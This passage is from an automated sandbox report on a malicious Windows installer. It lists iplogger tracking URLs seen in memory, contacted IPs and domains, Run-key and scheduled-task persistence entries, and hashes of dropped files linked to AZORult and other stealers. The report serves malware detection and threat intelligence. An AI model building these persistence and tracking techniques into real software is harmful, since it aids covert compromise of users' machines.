                                                                                                            https://cdn.iplogger.org/logo/512.pngB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cdn.iplogger.org/css/template.css?1.6.5B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.chameleon-managers.com3tcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cdn.iplogger.org/main-banner/main_banner_bg.webpB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.iplogger.org/js/jquery-3.6.1.min.jsB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://iplogger.org/invisible/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://counter-strike.com.ua/cexplorer.exe, 00000001.00000003.266890052.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://iplogger.org/sms-logger/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.chameleon-managers.comcexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.384784630.0000000005502000.00000004.00000020.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.chameleon-managers.comScexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
148.251.234.83 | iplogger.org | Germany | 24940 | HETZNER-ASDE | false
148.251.234.93 | 2no.co | Germany | 24940 | HETZNER-ASDE | false
142.250.180.147 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
142.250.184.84 | neosoft-activator.appspot.com | United States | 15169 | GOOGLEUS | false
51.15.219.86 | unknown | France | 12876 | OnlineSASFR | true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 813135
Start date and time: 2023-02-22 08:07:09 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@30/46@5/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 82% (good quality ratio 41.2%)
• Quality average: 32.1%
• Quality standard deviation: 37.4%
HCA Information: Failed
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
08:08:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
08:08:43 | API Interceptor | 2x Sleep call for process: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe modified
08:08:45 | Task Scheduler | Run new task: Chameleon Folder-user path: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
08:08:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
08:08:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
08:09:00 | API Interceptor | 2x Sleep call for process: ChameleonExplorer.exe modified
08:09:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                                                • 148.251.234.83
                                                                                                                                273F433BA1CEBFAD830E52490A04CA744351FC4624928.exeGet hashmaliciousPrivateLoader, RedLine, SocelarsBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                kTaMaf1Uqn.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                009206D0BB95A4DBEF8A24AD9D75434E0DC86CAABA9F0.exeGet hashmaliciousNymaim, PrivateLoader, RedLine, Vidar, Xmrig, onlyLoggerBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                DC812FA1AE68DFA017CFDE268E2AE523019308B102BCE.exeGet hashmaliciousPrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, zgRATBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                DAD9E695E9F592E48326DD349556F81987C115AD152BF.exeGet hashmaliciousFabookie, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar, zgRATBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                39C748040F01C934C73C23F4612CB33A0846219D8DD7B.exeGet hashmaliciousGlupteba, LummaC Stealer, PrivateLoader, RedLineBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                A3F0B643265E9895B3291658516CE2B34EB06D585BD8E.exeGet hashmaliciousAmadey, Nymaim, PrivateLoader, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                XkvOVuEgpY.exeGet hashmaliciousGlupteba, Nymaim, RedLine, SmokeLoaderBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                0fx8tmMwZ9.exeGet hashmaliciousFabookie, ManusCrypt, Nymaim, SocelarsBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                HzmqhxP0xt.exeGet hashmaliciousSocelarsBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                file.exeGet hashmaliciousSocelarsBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                PkjZMkwOLt.exeGet hashmaliciousSocelarsBrowse
                                                                                                                                • 148.251.234.83
                                                                                                                                file.exeGet hashmaliciousSocelarsBrowse
                                                                                                                                • 148.251.234.83
Match    Associated Sample Name / URL    SHA 256    Detection    Threat Name    Link    Context
Match    Associated Sample Name / URL    SHA 256    Detection    Threat Name    Link    Context
                                                                                                                                https://www.bing.com/ck/a?!&&p=6f06ea36b7b841b3JmltdHM9MTY3NjkzNzYwMCZpZ3VpZD0wNmYzMzZjNS01Y2Q5LTY1N2ItMGY3My0yNDdhNWQ0YjY0OGMmaW5zaWQ9NTE2MQ&ptn=3&hsh=3&fclid=06f336c5-5cd9-657b-0f73-247a5d4b648c&u=a1aHR0cHM6Ly9zb3V0aHNpbWNvZWJobC5jb20v#c3VzYW4uY2FtcGJlbGxAc2luYWkub3JnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://l.facebook.com/l.php?u=https%3A%2F%2Fappealcenter-2331.netlify.app%2F&h=AT3Ms2KDIY05Q79l2SYsArydmTLyBT0uln9V1Cs6ZPyHu4p905WxKUKkb_IdzbuXG-ZZHEk6c28hhpvw3ygrzK4P2saF70qyTsqQYwwp9H8aQSmX0BV_ZR_STB77wWkTjVF5wjrYsy77jhQspcgG&__tn__=-UK-R&c%5B0%5D=AT0EBvj_y1hOVZU1FIUdZP5x0wyw0p6yE480nyuOWwoA5lp9dSvixurJskwJGqt1kmj7HOlFvP17Z8GGHLRSXLk1hR84BAUbcVi7HoXVXb5RlyVKWIedmqCq_6bYEhO_Z_fNLax1EyV66K0OzDVnvFUohd3cS9q143pA5WOXT8GHXPAUqwfK91bBfx4DSYjMwFnmifr9wrNdMnzZujy9_TpQoSRjGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://westernequitypartners-my.sharepoint.com/:f:/g/personal/sarah_akelapest_com/Ehamj_RGXzxMpinv9tBN1AoBSp2aYdJsbftoRFQjwlyipQ?e=ZFoq0bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://survey123.arcgis.com/share/876caaaca3df43979b254e29f95c2a3bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://affiliate.insider.com/?amazonTrackingID=biauto-1053-20&postID=61b8efc8f2a36b1ac9f42d54&site=in&u=http://Motional.houseoflegendsusa.com/Motional/zeb.dawson@motional.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                http://download.tenorshare.net/downloads/4ukey.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                1082300000832.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fs.id%2f1A3MD%23dafelski%40wilburellis.com&c=E,1,jLcuZ-gijAThQ77L0hxFN1l378_T_ePjhO_xD3DlIGfmCeXGOqSIPvUSpfnm3CdjobEcYS5xl4urxMI6OU_tg3opmlOxTX-Z3Hg0ilodq0DDnd99ZcHBisG9eiTy&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                DETALLES DEL PAGO.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                https://adobes-team.adalo.com/adobeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                philip.chambers.Audiomsg4847.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 142.250.184.84
                                                                                                                                234567896543456789098765434567890.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 142.250.184.84
Match: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) | Associated Sample Name / URL: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe | Detection: malicious | Threat Name: AZORult
Match: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) | Associated Sample Name / URL: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe | Detection: malicious | Threat Name: AZORult
Match: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) | Associated Sample Name / URL: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe | Detection: malicious | Threat Name: AZORult
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):15091304
                                                                                                                                      Entropy (8bit):6.181292047546881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                                                      MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                                                      SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                                                      SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
• Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4644456
                                                                                                                                      Entropy (8bit):6.624930231136082
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                                                      MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                                                      SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                                                      SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                      Joe Sandbox View:
• Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):146536
                                                                                                                                      Entropy (8bit):5.3703743168809845
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                                                      MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                                                      SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                                                      SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                                                      SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
• Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805400
                                                                                                                                      Entropy (8bit):6.529115621464912
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                                                      MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                                                      SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                                                      SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                                                      SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1275416
                                                                                                                                      Entropy (8bit):5.811103517353428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                                                      MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                                                      SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                                                      SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                                                      SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):768032
                                                                                                                                      Entropy (8bit):6.537086415352977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                                                      MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                                                      SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                                                      SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                                                      SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                                                      MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                                                      SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                                                      SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                                                      SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1226272
                                                                                                                                      Entropy (8bit):5.8428341731794005
                                                                                                                                      Encrypted:false
